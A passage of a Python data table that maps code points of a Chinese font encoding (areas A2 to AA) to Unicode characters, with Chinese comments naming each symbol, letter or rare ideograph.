0xA291: 0x1E91, # 多国外文 = ẑ
0xA292: 0x0109, # 多国外文 = ĉ
0xA293: 0x00E7, # 多国外文 = ç
0xA294: 0xA294, # 多国外文(ê̄)
0xA295: 0x1EBF, # 多国外文 = ế
0xA296: 0xA296, # 多国外文(ê̌)
0xA297: 0x1EC1, # 多国外文 = ề
0xA29A: 0x0307, # 组合用发音符 = ̇
0xA29B: 0x030A, # 组合用发音符 = ̊
0xA29C: 0x0303, # 组合用发音符 = ̃
0xA29D: 0x20F0, # 组合用发音符 = ⃰
0xA29E: 0x0306, # 组合用发音符 = ̆
0xA29F: 0x002C, # 外文逗号 = ,
0xA2A0: 0x0085, # 外文三点省略号,外文三连点 = …
0xA2AB: 0x217A, # 小写罗马数字11 = ⅺ
0xA2AC: 0x217B, # 小写罗马数字12 = ⅻ
0xA2AD: 0xA2AD, # 小写罗马数字13(ⅹⅲ)
0xA2AE: 0xA2AE, # 小写罗马数字14(ⅹⅳ)
0xA2AF: 0xA2AF, # 小写罗马数字15(ⅹⅴ)
0xA2B0: 0xA2B0, # 小写罗马数字16(ⅹⅵ)
0xA2EF: 0xA2EF, # 大写罗马数字15(ⅩⅤ)
0xA2F0: 0xA2F0, # 大写罗马数字16(ⅩⅥ)
0xA2FD: 0xA2FD, # 大写罗马数字13(ⅩⅢ)
0xA2FE: 0xA2FE, # 大写罗马数字14(ⅩⅣ)
})
# Area A3
_update({
0xA340: 0xA340, # 带括号的大写罗马数字1((Ⅰ))
0xA341: 0xA341, # 带括号的大写罗马数字2((Ⅱ))
0xA342: 0xA342, # 带括号的大写罗马数字3((Ⅲ))
0xA343: 0xA343, # 带括号的大写罗马数字4((Ⅳ))
0xA344: 0xA344, # 带括号的大写罗马数字5((Ⅴ))
0xA345: 0xA345, # 带括号的大写罗马数字6((Ⅵ))
0xA346: 0xA346, # 带括号的大写罗马数字7((Ⅶ))
0xA347: 0xA347, # 带括号的大写罗马数字8((Ⅷ))
0xA348: 0xA348, # 带括号的大写罗马数字9((Ⅸ))
0xA349: 0xA349, # 带括号的大写罗马数字10((Ⅹ))
0xA34A: 0xA34A, # 带括号的大写罗马数字11((Ⅺ))
0xA34B: 0xA34B, # 带括号的大写罗马数字12((Ⅻ))
0xA34C: 0x24FF, # 数字阴圈码0 = ⓿
0xA34D: 0x2776, # 数字阴圈码1 = ❶
0xA34E: 0x2777, # 数字阴圈码2 = ❷
0xA34F: 0x2778, # 数字阴圈码3 = ❸
0xA350: 0x2779, # 数字阴圈码4 = ❹
0xA351: 0x277A, # 数字阴圈码5 = ❺
0xA352: 0x277B, # 数字阴圈码6 = ❻
0xA353: 0x277C, # 数字阴圈码7 = ❼
0xA354: 0x277D, # 数字阴圈码8 = ❽
0xA355: 0x277E, # 数字阴圈码9 = ❾
0xA356: 0x24B6, # 字母阳圈码A = Ⓐ
0xA357: 0x24B7, # 字母阳圈码B = Ⓑ
0xA358: 0x24B8, # 字母阳圈码C = Ⓒ
0xA359: 0x24B9, # 字母阳圈码D = Ⓓ
0xA35A: 0x24BA, # 字母阳圈码E = Ⓔ
0xA35B: 0x24BB, # 字母阳圈码F = Ⓕ
0xA35C: 0x24BC, # 字母阳圈码G = Ⓖ
0xA35D: 0x24BD, # 字母阳圈码H = Ⓗ
0xA35E: 0x24BE, # 字母阳圈码I = Ⓘ
0xA35F: 0x24BF, # 字母阳圈码J = Ⓙ
0xA360: 0x1F110, # 圆括号码A = 🄐
0xA361: 0x1F111, # 圆括号码B = 🄑
0xA362: 0x1F112, # 圆括号码C = 🄒
0xA363: 0x1F113, # 圆括号码D = 🄓
0xA364: 0x1F114, # 圆括号码E = 🄔
0xA365: 0x1F115, # 圆括号码F = 🄕
0xA366: 0x1F116, # 圆括号码G = 🄖
0xA367: 0x1F117, # 圆括号码H = 🄗
0xA368: 0x1F118, # 圆括号码I = 🄘
0xA369: 0x1F119, # 圆括号码J = 🄙
0xA36A: 0x24D0, # 阳圈码a = ⓐ
0xA36B: 0x24D1, # 阳圈码b = ⓑ
0xA36C: 0x24D2, # 阳圈码c = ⓒ
0xA36D: 0x24D3, # 阳圈码d = ⓓ
0xA36E: 0x24D4, # 阳圈码e = ⓔ
0xA36F: 0x24D5, # 阳圈码f = ⓕ
0xA370: 0x24D6, # 阳圈码g = ⓖ
0xA371: 0x24D7, # 阳圈码h = ⓗ
0xA372: 0x24D8, # 阳圈码i = ⓘ
0xA373: 0x24D9, # 阳圈码j = ⓙ
0xA374: 0x249C, # 圆括号码a = ⒜
0xA375: 0x249D, # 圆括号码b = ⒝
0xA376: 0x249E, # 圆括号码c = ⒞
0xA377: 0x249F, # 圆括号码d = ⒟
0xA378: 0x24A0, # 圆括号码e = ⒠
0xA379: 0x24A1, # 圆括号码f = ⒡
0xA37A: 0x24A2, # 圆括号码g = ⒢
0xA37B: 0x24A3, # 圆括号码h = ⒣
0xA37C: 0x24A4, # 圆括号码i = ⒤
0xA37D: 0x24A5, # 圆括号码j = ⒥
0xA37E: 0x3396, # 单位符号:毫升 = ㎖
0xA380: 0x3397, # ㎗
0xA381: 0x33CB, # 单位符号:百帕 = ㏋
0xA382: 0x3398, # 单位符号:立升 = ㎘
0xA383: 0x33A0, # 单位符号:平方厘米 = ㎠
0xA384: 0x33A4, # 单位符号:立方厘米 = ㎤
0xA385: 0x33A5, # 单位符号:立方米 = ㎥
0xA386: 0x33A2, # 单位符号:平方公里 = ㎢
0xA387: 0x33BE, # 单位符号:千瓦 = ㎾
0xA388: 0x33C4, # ㏄
0xA389: 0x3383, # 单位符号:毫安 = ㎃
0xA38A: 0x33C2, # ㏂
0xA38B: 0x33D8, # ㏘
0xA38C: 0x33CD, # ㏍
0xA38D: 0x33D7, # ㏗
0xA38E: 0x33DA, # ㏚
0xA38F: 0x339C, # ㎜
0xA390: 0x339D, # ㎝
0xA391: 0x339E, # ㎞
0xA392: 0x33CE, # 单位符号:公里 = ㏎
0xA393: 0x338E, # 单位符号:毫克 = ㎎
0xA394: 0x338F, # 单位符号:千克(公斤) = ㎏
0xA395: 0x33A1, # 单位符号:平方米 = ㎡
0xA396: 0x33D2, # ㏒
0xA397: 0x33D1, # ㏑
0xA398: 0x33C4, # ㏄
0xA399: 0x33D5, # ㏕
0xA39A: 0xAB36, # ꬶ
0xA39B: 0x2113, # ℓ
0xA39C: 0x006D, # m
0xA39D: 0x0078, # x
0xA39E: 0x1EFF, # ỿ
0xA39F: 0x0028, # 左开圆括号 = (
0xA3A0: 0x0029, # 右闭圆括号 = )
})
# Area A4
_update({
0xA440: 0xA440, # BD语言注解:四分空(◯ + ¼)
0xA441: 0xA441, # BD语言注解:二分空(◯ + ½)
0xA442: 0xA442, # BD语言注解:六分空(◯ + ⅙)
0xA443: 0xA443, # BD语言注解:八分空(◯ + ⅙)
0xA444: 0xA444, # (◇ + ◼ + ⬦)
0xA445: 0xA445, # (◇ + ◻)
0xA446: 0xA446, # (☐ + ◆ + ◻)
0xA447: 0xA447, # (⏹ + ⬦)
0xA448: 0x29C8, # ⧈
0xA449: 0x1F79C, # 🞜
0xA44A: 0xA44A, # (◆ + ◻)
0xA44B: 0xA44B, # (◇ + ◼)
0xA44C: 0xA44C, # (☐ + ◆)
0xA44D: 0x26CB, # ⛋
0xA44E: 0x2756, # ❖
0xA44F: 0xA44F, # (negative ❖)
0xA450: 0xA450, # (5-black-square cross, like ⸭)
0xA451: 0xA451, # (5-white-square cross, like ⌘)
0xA452: 0x2795, # ➕
0xA453: 0x271A, # ✚
0xA454: 0x23FA, # ⏺
0xA455: 0x2704, # ✄
0xA456: 0x25C9, # ◉
0xA457: 0x2A00, # ⨀
0xA458: 0x2740, # ❀
0xA459: 0x273F, # ✿
0xA45A: 0x2668, # ♨
0xA45B: 0x2669, # ♩
0xA45C: 0x266A, # ♪
0xA45D: 0x266C, # ♬
0xA45E: 0x2B57, # ⭗
0xA45F: 0x26BE, # ⚾
0xA460: 0x260E, # ☎
0xA461: 0x2025, # ‥
0xA462: 0x261C, # ☜
0xA463: 0x261E, # ☞
0xA464: 0x3021, # 杭州记数标记“一” = 〡
0xA465: 0x3022, # 杭州记数标记“二” = 〢
0xA466: 0x3023, # 杭州记数标记“三” = 〣
0xA467: 0x3024, # 杭州记数标记“四” = 〤
0xA468: 0x3025, # 杭州记数标记“五” = 〥
0xA469: 0x3026, # 杭州记数标记“六” = 〦
0xA46A: 0x3027, # 杭州记数标记“七” = 〧
0xA46B: 0x3028, # 杭州记数标记“八” = 〨
0xA46C: 0x3029, # 杭州记数标记“九” = 〩
0xA46D: 0x3038, # 杭州记数标记“十” = 〸
0xA46E: 0x3039, # 杭州记数标记“廿” = 〹
0xA46F: 0x303A, # 杭州记数标记“卅” = 〺
0xA470: 0x25A2, # ▢
0xA471: 0x00AE, # ®
0xA472: 0x25CF, # ●
0xA473: 0x25CB, # ○
0xA474: 0x25CB, # ♡
0xA475: 0x25CA, # ◊
0xA476: 0xA476, # (▽ + ▿)
0xA477: 0x2236, # ∶
0xA478: 0xA478, # 毫米(m/m)
0xA479: 0xA479, # 厘米(c/m)
0xA47A: 0xA47A, # 分米(d/m)
0xA47B: 0x2105, # ℅
0xA47D: 0xA47D, # (circled ™)
0xA47E: 0x2122, # ™
0xA480: 0xAB65, # ꭥ
0xA481: 0x026E, # ɮ
0xA482: 0x02A7, # ʧ
0xA483: 0x01EB, # ǫ
0xA484: 0x03C5, # υ
0xA485: 0xA7AC, # Ɡ
0xA486: 0x1D93, # ᶓ
0xA487: 0x1D74, # ᵴ
0xA488: 0x1D92, # ᶒ
0xA489: 0x1D95, # ᶕ
0xA48A: 0x02AE, # ʮ
0xA48B: 0x1D8B, # ᶋ
0xA48C: 0x0119, # ę
0xA48D: 0x01BE, # ƾ
0xA48E: 0x1D97, # ᶗ
0xA48F: 0x0293, # ʓ
0xA490: 0xA490, # (hɥ)
0xA491: 0x0253, # ɓ
0xA492: 0x0287, # ʇ
0xA493: 0x01AB, # ƫ
0xA494: 0x028D, # ʍ
0xA495: 0x1D8D, # ᶍ
0xA496: 0x0269, # ɩ
0xA497: 0x025C, # ɜ
0xA498: 0x02A5, # ʥ
0xA499: 0x019E, # ƞ
0xA49A: 0x01AA, # ƪ
0xA49B: 0x0250, # ɐ
0xA49C: 0x0286, # ʆ
0xA49D: 0x01BB, # ƻ
0xA49E: 0x00D8, # Ø
0xA4F4: 0xA4F4, # 三叹号(!!!)
0xA4F5: 0xA4F5, # 斜三叹号(italic !!!)
0xA4F6: 0x32A3, # 带圈汉字:正 = ㊣
0xA4F7: 0x329E, # 带圈汉字:印 = ㊞
0xA4F8: 0x32A4, # 带圈汉字:上 = ㊤
0xA4F9: 0x32A5, # 带圈汉字:中 = ㊥
0xA4FA: 0x32A6, # 带圈汉字:下 = ㊦
0xA4FB: 0x32A7, # 带圈汉字:左 = ㊧
0xA4FC: 0x32A8, # 带圈汉字:右 = ㊨
0xA4FD: 0xA4FD, # 带圈汉字:大(◯ + 大)
0xA4FE: 0xA4FE, # 带圈汉字:小(◯ + 小)
})
# Area A5
_update({
0xA540: 0x0111, # đ
0xA541: 0x1D80, # ᶀ
0xA542: 0x1D81, # ᶁ
0xA543: 0x0252, # ɒ
0xA544: 0xA544, # (ŋ + ʷ)
0xA545: 0x026B, # ɫ
0xA546: 0x1D88, # ᶈ
0xA547: 0x1D82, # ᶂ
0xA548: 0x02A6, # ʦ
0xA549: 0x025F, # ɟ
0xA54A: 0x00FE, # þ
0xA54B: 0x0257, # ɗ
0xA54C: 0xAB67, # ꭧ
0xA54D: 0x0260, # ɠ
0xA54E: 0x0242, # ɂ
0xA54F: 0x02AF, # ʯ
0xA550: 0xA550, # (ʯ)
0xA551: 0x0241, # Ɂ
0xA552: 0x025A, # ɚ
0xA553: 0x1D8A, # ᶊ
0xA554: 0x0296, # ʖ
0xA555: 0x1D8C, # ᶌ
0xA556: 0x1D75, # ᵵ
0xA557: 0x1D6D, # ᵭ
0xA558: 0x027D, # ɽ
0xA559: 0x027A, # ɺ
0xA55A: 0x01BA, # ƺ
0xA55B: 0xA55B, # (turned ɰ)
0xA55C: 0x0273, # ɳ
0xA55D: 0xA795, # ꞕ
0xA55E: 0x01B0, # ư
0xA55F: 0x1D85, # ᶅ
0xA560: 0x0260, # ɠ
0xA561: 0x1D86, # ᶆ
0xA562: 0x0277, # ɷ
0xA563: 0x02A4, # ʤ
0xA564: 0x02A3, # ʣ
0xA565: 0x1D87, # ᶇ
0xA566: 0x1D7C, # ᵼ
0xA567: 0x02A8, # ʨ
0xA568: 0x1D8F, # ᶏ
0xA569: 0x029A, # ʚ
0xA56A: 0x1D9A, # ᶚ
0xA56B: 0xA727, # ꜧ
0xA56C: 0x1D83, # ᶃ
0xA56D: 0xA56D, # (italic ŋ)
0xA56E: 0x029E, # ʞ
0xA56F: 0x0195, # ƕ
0xA570: 0x1D76, # ᵶ
0xA571: 0x027E, # ɾ
0xA572: 0x1D8E, # ᶎ
0xA573: 0x1D89, # ᶉ
0xA574: 0x027C, # ɼ
0xA575: 0x0279, # ɹ
0xA576: 0x018D, # ƍ
0xA577: 0x03C9, # ω
0xA578: 0x025D, # ɝ
0xA579: 0x03C3, # σ
0xA57A: 0x027B, # ɻ
0xA57B: 0x026D, # ɭ
0xA57C: 0x0267, # ɧ
0xA57D: 0x025A, # ɚ
0xA57E: 0xAB66, # ꭦ
0xA580: 0x5F02, # 异
0xA581: 0x28473, # 𨑳
0xA582: 0x5194, # 冔
0xA583: 0x247A3, # 𤞣
0xA584: 0x2896D, # 𨥭
0xA585: 0x5642, # 噂
0xA586: 0x7479, # 瑹
0xA587: 0x243B9, # 𤎹
0xA588: 0x723F, # 爿
0xA589: 0x9D56, # 鵖
0xA58A: 0x4D29, # 䴩
0xA58B: 0x20779, # 𠝹
0xA58C: 0x210F1, # 𡃱
0xA58D: 0x2504C, # 𥁌
0xA58E: 0x233CC, # 𣏌
0xA58F: 0x032F, # 下加符 = ̯
0xA590: 0x0312, # 下加符 = ̒
0xA591: 0x030D, # 下加符 = ̍
0xA592: 0x0314, # 下加符 = ̔
0xA593: 0x0313, # 下加符 = ̓
0xA594: 0x2F83B, # 吆
0xA595: 0x25EC0, # 𥻀
0xA596: 0x445B, # 䑛
0xA597: 0x21D3E, # 𡴾
0xA598: 0x0323, # 下加符 = ̣
0xA599: 0x0325, # 下加符 = ̥
0xA59A: 0x0331, # 下加符 = ̱
0xA59B: 0x032A, # 下加符 = ̪
0xA59C: 0x032C, # 下加符 = ̬
0xA59D: 0x032B, # 下加符 = ̫
0xA59E: 0x0329, # 下加符 = ̩
0xA59F: 0xFF5B, # 左开花括号 = {
0xA5A0: 0xFF5D, # 右闭花括号 = }
0xA5F7: 0x3016, # 左空方圆括号 = 〖
0xA5F8: 0x3017, # 右空方圆括号 = 〗
0xA5F9: 0x29DB, # ⧛
0xA5FA: 0xA5FA, # (vertical ⧛)
0xA5FB: 0x534D, # 卍
0xA5FC: 0xFE47, # 竖排上方括号 = ﹇
0xA5FD: 0xFE48, # 竖排下方括号 = ﹈
0xA5FE: 0x2571, # 斜线 = ╱
})
# Area A6
_update({
0xA640: 0x00C5, # 多国外文 = Å
0xA641: 0x0100, # 多国外文 = Ā
0xA642: 0x00C1, # 多国外文 = Á
0xA643: 0x01CD, # 多国外文 = Ǎ
0xA644: 0x00C0, # 多国外文 = À
0xA645: 0x00C2, # 多国外文 = Â
0xA646: 0x00C4, # 多国外文 = Ä
0xA647: 0x00C3, # 多国外文 = Ã
0xA648: 0x0112, # 多国外文 = Ē
0xA649: 0x00C9, # 多国外文 = É
0xA64A: 0x011A, # 多国外文 = Ě
0xA64B: 0x00C8, # 多国外文 = È
0xA64C: 0x00CA, # 多国外文 = Ê
0xA64D: 0x00CB, # 多国外文 = Ë
0xA64E: 0x1EBC, # 多国外文 = Ẽ
0xA64F: 0x012A, # 多国外文 = Ī
0xA650: 0x00CD, # 多国外文 = Í
0xA651: 0x01CF, # 多国外文 = Ǐ
0xA652: 0x00CC, # 多国外文 = Ì
0xA653: 0x00CE, # 多国外文 = Î
0xA654: 0x00CF, # 多国外文 = Ï
0xA655: 0x014C, # 多国外文 = Ō
0xA656: 0x00D3, # 多国外文 = Ó
0xA657: 0x01D1, # 多国外文 = Ǒ
0xA658: 0x00D2, # 多国外文 = Ò
0xA659: 0x00D4, # 多国外文 = Ô
0xA65A: 0x00D6, # 多国外文 = Ö
0xA65B: 0x00D5, # 多国外文 = Õ
0xA65C: 0x016A, # 多国外文 = Ū
0xA65D: 0x00DA, # 多国外文 = Ú
0xA65E: 0x01D3, # 多国外文 = Ǔ
0xA65F: 0x00D9, # 多国外文 = Ù
0xA660: 0x00DB, # 多国外文 = Û
0xA661: 0x00DC, # 多国外文 = Ü
0xA662: 0x01D5, # 多国外文 = Ǖ
0xA663: 0x01D7, # 多国外文 = Ǘ
0xA664: 0x01D9, # 多国外文 = Ǚ
0xA665: 0x01DB, # 多国外文 = Ǜ
0xA666: 0xA666, # 多国外文(Ü̂)
0xA667: 0x0108, # 多国外文 = Ĉ
0xA668: 0x011C, # 多国外文 = Ĝ
0xA669: 0x0124, # 多国外文 = Ĥ
0xA66A: 0x0134, # 多国外文 = Ĵ
0xA66B: 0x0160, # 多国外文 = Š
0xA66C: 0x015C, # 多国外文 = Ŝ
0xA66D: 0x0178, # 多国外文 = Ÿ
0xA66E: 0x017D, # 多国外文 = Ž
0xA66F: 0x1E90, # 多国外文 = Ẑ
0xA670: 0x0125, # 多国外文 = ĥ
0xA671: 0x0135, # 多国外文 = ĵ
0xA672: 0x00D1, # 多国外文 = Ñ
0xA673: 0x00E1, # á
0xA674: 0x00E9, # é
0xA675: 0x00ED, # í
0xA676: 0x00F3, # ó
0xA677: 0x00FA, # ú
0xA678: 0x2339D, # 𣎝
0xA679: 0x29F15, # 𩼕
0xA67A: 0x23293, # 𣊓
0xA67B: 0x3CA0, # 㲠
0xA67C: 0x2F922, # 牐
0xA67D: 0x24271, # 𤉱
0xA67E: 0x2720F, # 𧈏
0xA680: 0x00C1, # Á
0xA681: 0x0403, # Ѓ
0xA682: 0x00C9, # É
0xA683: 0x040C, # Ќ
0xA684: 0x00D3, # Ó
0xA685: 0x00FD, # ý
0xA686: 0xA686, # (Ы́)
0xA687: 0xA687, # (Э́)
0xA688: 0x04EC, # Ӭ
0xA689: 0xA689, # (Ю́)
0xA68A: 0xA68A, # (Я́)
0xA68B: 0xA68B, # (ѣ́)
0xA68C: 0xA68C, # (Ѣ́)
0xA68D: 0xA68D, # (И́)
0xA68E: 0x27E1B, # 𧸛
0xA68F: 0x910B, # 鄋
0xA690: 0x29F14, # 𩼔
0xA691: 0x2A0DF, # 𪃟
0xA692: 0x20270, # 𠉰
0xA693: 0x203F1, # 𠏱
0xA694: 0x211AB, # 𡆫
0xA695: 0x211E5, # 𡇥
0xA696: 0x21290, # 𡊐
0xA697: 0x363E, # 㘾
0xA698: 0x212DF, # 𡋟
0xA699: 0x57D7, # 埗
0xA69A: 0x2165F, # 𡙟
0xA69B: 0x248C2, # 𤣂
0xA69C: 0x22288, # 𢊈
0xA69D: 0x23C62, # 𣱢
0xA69E: 0x24276, # 𤉶
0xA69F: 0xFF1A, # 冒号 = :
0xA6A0: 0xFF1B, # 分号 = ;
0xA6B9: 0x2202, # 小写希腊字母 = ∂
0xA6BA: 0x03F5, # 小写希腊字母 = ϵ
0xA6BB: 0x03D1, # 小写希腊字母 = ϑ
0xA6BC: 0x03D5, # 小写希腊字母 = ϕ
0xA6BD: 0x03C6, # 小写希腊字母 = φ
0xA6BE: 0x03F0, # 小写希腊字母 = ϰ
0xA6BF: 0x03F1, # 小写希腊字母 = ϱ
0xA6C0: 0x03C2, # 小写希腊字母 = ς
0xA6D9: 0xFE10, # 竖排逗号 = ︐
0xA6DA: 0xFE12, # 竖排句号 = ︒
0xA6DB: 0xFE11, # 竖排顿号 = ︑
0xA6DC: 0xFE13, # 竖排冒号 = ︓
0xA6DD: 0xFE14, # 竖排分号 = ︔
0xA6DE: 0xFE15, # 竖排感叹号 = ︕
0xA6DF: 0xFE16, # 竖排问号 = ︖
0xA6EC: 0xFE17, # 竖排上空方圆括号 = ︗
0xA6ED: 0xFE18, # 竖排下空方圆括号 = ︘
0xA6F3: 0xFE19, # 竖排三点省略号 = ︙
0xA6F6: 0x00B7, # 居中间隔点 = ·
0xA6F7: 0xA6F7, # 居中逗号(middle ,)
0xA6F8: 0xA6F8, # 居中句号(middle 。)
0xA6F9: 0xA6F9, # 居中顿号(middle 、)
0xA6FA: 0xA6FA, # 居中冒号(middle :)
0xA6FB: 0xA6FB, # 居中分号(middle ;)
0xA6FC: 0xA6FC, # 居中感叹号(middle !)
0xA6FD: 0xA6FD, # 居中问号(middle ?)
0xA6FE: 0xA6FE # ( ͘)
})
# Area A7
_update({
0xA740: 0x24235, # 𤈵
0xA741: 0x2431A, # 𤌚
0xA742: 0x2489B, # 𤢛
0xA743: 0x4B63, # 䭣
0xA744: 0x25581, # 𥖁
0xA745: 0x25BB0, # 𥮰
0xA746: 0x7C06, # 簆
0xA747: 0x23388, # 𣎈
0xA748: 0x26A40, # 𦩀
0xA749: 0x26F16, # 𦼖
0xA74A: 0x2717F, # 𧅿
0xA74B: 0x22A98, # 𢪘
0xA74C: 0x3005, # 々
0xA74D: 0x22F7E, # 𢽾
0xA74E: 0x27BAA, # 𧮪
0xA74F: 0x20242, # 𠉂
0xA750: 0x23C5D, # 𣱝
0xA751: 0x22650, # 𢙐
0xA752: 0x247EF, # 𤟯
0xA753: 0x26221, # 𦈡
0xA754: 0x29A02, # 𩨂
0xA755: 0x45EA, # 䗪
0xA756: 0x26B4C, # 𦭌
0xA757: 0x26D9F, # 𦶟
0xA758: 0x26ED8, # 𦻘
0xA759: 0x359E, # 㖞
0xA75A: 0x20E01, # 𠸁
0xA75B: 0x20F90, # 𠾐
0xA75C: 0x3A18, # 㨘
0xA75D: 0x241A2, # 𤆢
0xA75E: 0x3B74, # 㭴
0xA75F: 0x43F2, # 䏲
0xA760: 0x40DA, # 䃚
0xA761: 0x3FA6, # 㾦
0xA762: 0x24ECA, # 𤻊
0xA763: 0x28C3E, # 𨰾
0xA764: 0x28C47, # 𨱇
0xA765: 0x28C4D, # 𨱍
0xA766: 0x28C4F, # 𨱏
0xA767: 0x28C4E, # 𨱎
0xA768: 0x28C54, # 𨱔
0xA769: 0x28C53, # 𨱓
0xA76A: 0x25128, # 𥄨
0xA76B: 0x251A7, # 𥆧
0xA76C: 0x45AC, # 䖬
0xA76D: 0x26A2D, # 𦨭
0xA76E: 0x41F2, # 䇲
0xA76F: 0x26393, # 𦎓
0xA770: 0x29F7C, # 𩽼
0xA771: 0x29F7E, # 𩽾
0xA772: 0x29F83, # 𩾃
0xA773: 0x29F87, # 𩾇
0xA774: 0x29F8C, # 𩾌
0xA775: 0x27785, # 𧞅
0xA776: 0x2775E, # 𧝞
0xA777: 0x28EE7, # 𨻧
0xA778: 0x290AF, # 𩂯
0xA779: 0x2070E, # 𠜎
0xA77A: 0x22AC1, # 𢫁
0xA77B: 0x20CED, # 𠳭
0xA77C: 0x3598, # 㖘
0xA77D: 0x220C7, # 𢃇
0xA77E: 0x22B43, # 𢭃
0xA780: 0x4367, # 䍧
0xA781: 0x20CD3, # 𠳓
0xA782: 0x20CAC, # 𠲬
0xA783: 0x36E2, # 㛢
0xA784: 0x35CE, # 㗎
0xA785: 0x3B39, # 㬹
0xA786: 0x44EA, # 䓪
0xA787: 0x20E96, # 𠺖
0xA788: 0x20E4C, # 𠹌
0xA789: 0x35ED, # 㗭
0xA78A: 0x20EF9, # 𠻹
0xA78B: 0x24319, # 𤌙
0xA78C: 0x267CC, # 𦟌
0xA78D: 0x28056, # 𨁖
0xA78E: 0x28840, # 𨡀
0xA78F: 0x20F90, # 𠾐
0xA790: 0x21014, # 𡀔
0xA791: 0x236DC, # 𣛜
0xA792: 0x28A17, # 𨨗
0xA793: 0x28879, # 𨡹
0xA794: 0x4C9E, # 䲞
0xA795: 0x20410, # 𠐐
0xA796: 0x40DF, # 䃟
0xA797: 0x210BF, # 𡂿
0xA798: 0x22E0B, # 𢸋
0xA799: 0x4312, # 䌒
0xA79A: 0x233AB, # 𣎫
0xA79B: 0x2812E, # 𨄮
0xA79C: 0x4A31, # 䨱
0xA79D: 0x27B48, # 𧭈
0xA79E: 0x29EAC, # 𩺬
0xA79F: 0x23822, # 𣠢
0xA7A0: 0x244CB, # 𤓋
0xA7C2: 0x0409, # 大写俄文字母LJE = Љ
0xA7C3: 0x040A, # 大写俄文字母NJE = Њ
0xA7C4: 0x040F, # 大写俄文字母DZHE = Џ
0xA7C5: 0x04AE, # 大写俄文字母 = Ү
0xA7C6: 0x0402, # 俄文字母 = Ђ
0xA7C7: 0x040B, # 俄文字母 = Ћ
0xA7C8: 0x0474, # 俄文字母 = Ѵ
0xA7C9: 0x0462, # 俄文字母 = Ѣ
0xA7CA: 0x0463, # 俄文字母 = ѣ
0xA7CB: 0x04E8, # 俄文字母 = Ө
0xA7CC: 0x0459, # 俄文字母 = љ
0xA7CD: 0x045A, # 俄文字母 = њ
0xA7CE: 0x045F, # 俄文字母 = џ
0xA7CF: 0x04AF, # 俄文字母 = ү
0xA7F2: 0x00E1, # 俄文字母 = á
0xA7F3: 0x00E9, # 俄文字母 = é
0xA7F4: 0xA7F4, # 俄文字母(и́)
0xA7F5: 0x00F3, # 俄文字母 = ó
0xA7F6: 0x00FD, # 俄文字母 = ý
0xA7F7: 0xA7F7, # 俄文字母(ы́)
0xA7F8: 0xA7F8, # 俄文字母(э́)
0xA7F9: 0xA7F9, # 俄文字母(ю́)
0xA7FA: 0xA7FA, # 俄文字母(я́)
0xA7FB: 0x0452, # 俄文字母 = ђ
0xA7FC: 0x045B, # 俄文字母 = ћ
0xA7FD: 0x0475, # 俄文字母 = ѵ
0xA7FE: 0x04E9 # 俄文字母 = ө
})
# Area A8
_update({
0xA8BC: 0x1E3F, # 汉语拼音(ḿ) = ḿ
0xA8C1: 0xA8C1, # 中文阴圈码十(⏺ + 十)
0xA8C2: 0xA8C2, # 中文阴圈码廿(⏺ + 廿)
0xA8C3: 0xA8C3, # 中文阴圈码卅(⏺ + 卅)
0xA8C4: 0x4E00, # 注音符号— = 一
0xA8EA: 0xA8EA, # 中文阴框码一(⏹ + 一)
0xA8EB: 0xA8EB, # 中文阴框码二(⏹ + 二)
0xA8EC: 0xA8EC, # 中文阴框码三(⏹ + 三)
0xA8ED: 0xA8ED, # 中文阴框码四(⏹ + 四)
0xA8EE: 0xA8EE, # 中文阴框码五(⏹ + 五)
0xA8EF: 0xA8EF, # 中文阴框码六(⏹ + 六)
0xA8F0: 0xA8F0, # 中文阴框码七(⏹ + 七)
0xA8F1: 0xA8F1, # 中文阴框码八(⏹ + 八)
0xA8F2: 0xA8F2, # 中文阴框码九(⏹ + 九)
0xA8F3: 0xA8F3, # 中文阴框码十(⏹ + 十)
0xA8F4: 0xA8F4, # 中文阴框码廿(⏹ + 廿)
0xA8F5: 0xA8F5, # 中文阴框码卅(⏹ + 卅)
0xA8F6: 0xA8F6, # 中文阴圈码一(⏺ + 一)
0xA8F7: 0xA8F7, # 中文阴圈码二(⏺ + 二)
0xA8F8: 0xA8F8, # 中文阴圈码三(⏺ + 三)
0xA8F9: 0xA8F9, # 中文阴圈码四(⏺ + 四)
0xA8FA: 0xA8FA, # 中文阴圈码五(⏺ + 五)
0xA8FB: 0xA8FB, # 中文阴圈码六(⏺ + 六)
0xA8FC: 0xA8FC, # 中文阴圈码七(⏺ + 七)
0xA8FD: 0xA8FD, # 中文阴圈码八(⏺ + 八)
0xA8FE: 0xA8FE # 中文阴圈码九(⏺ + 九)
})
# Area A9
_update({
0xA9A1: 0xA9A1, # (╪)
0xA9A2: 0xA9A2, # (╡)
0xA9F0: 0x21E8, # 空心向右箭头 = ⇨
0xA9F1: 0x21E6, # 空心向左箭头 = ⇦
0xA9F2: 0x2B06, # 实心向上箭头 = ⬆
0xA9F3: 0x2B07, # 实心向下箭头 = ⬇
0xA9F4: 0x27A1, # 实心向右箭头 = ➡
0xA9F5: 0x2B05, # 实心向左箭头 = ⬅
0xA9F6: 0x2B62, # 箭头-无翅向右 = ⭢
0xA9F7: 0x2B60, # 箭头-无翅向左 = ⭠
0xA9F8: 0x2B61, # 箭头-无翅向左 = ⭡
0xA9F9: 0x2B63, # 箭头-无翅向左 = ⭣
0xA9FA: 0x21C1, # 箭头-下单翅向右 = ⇁
0xA9FB: 0x21BD, # 箭头-下单翅向左 = ↽
0xA9FC: 0xA9FC, # 箭头-双向向内(ꜜ͎)
0xA9FD: 0x2195, # 箭头-双向向外 = ↕
0xA9FE: 0x2B65, # 箭头-无翅双向向外 = ⭥
})
# Area AA
_update({
0xAAA1: 0xAAA1, # BD语言注解:盘外符开弧(⸨)
0xAAA2: 0xAAA2, # BD语言注解:盘外符标记()→)
0xAAA3: 0xAAA3, # BD语言注解:盘外符闭弧(⸩)
0xAAA4: 0xAAA4, # BD语言注解:换行符(⇙)
0xAAA5: 0xAAA5, # BD语言注解:换段符(↙)
0xAAA6: 0xAAA6, # BD语言注解:小样文件结束(Ω)
0xAAA7: 0xAAA7, # BD语言注解:数学态标记(◯ + ﹩)
0xAAA8: 0xAAA8, # BD语言注解:自定义参数(◯ + ﹠)
0xAAA9: 0xAAA9, # BD语言注解:盒子开弧(⦃)
0xAAAA: 0xAAAA, # BD语言注解:盒子闭弧(⦄)
0xAAAB: 0xAAAB, # BD语言注解:转字体标记(ⓩ)
0xAAAC: 0xAAAC, # BD语言注解:上标(⤊)
0xAAAD: 0xAAAD, # BD语言注解:下标(⤋)
0xAAB0: 0x002C, # 千分撇 = ,
0xAAB1: 0x002E, # 小数点 = .
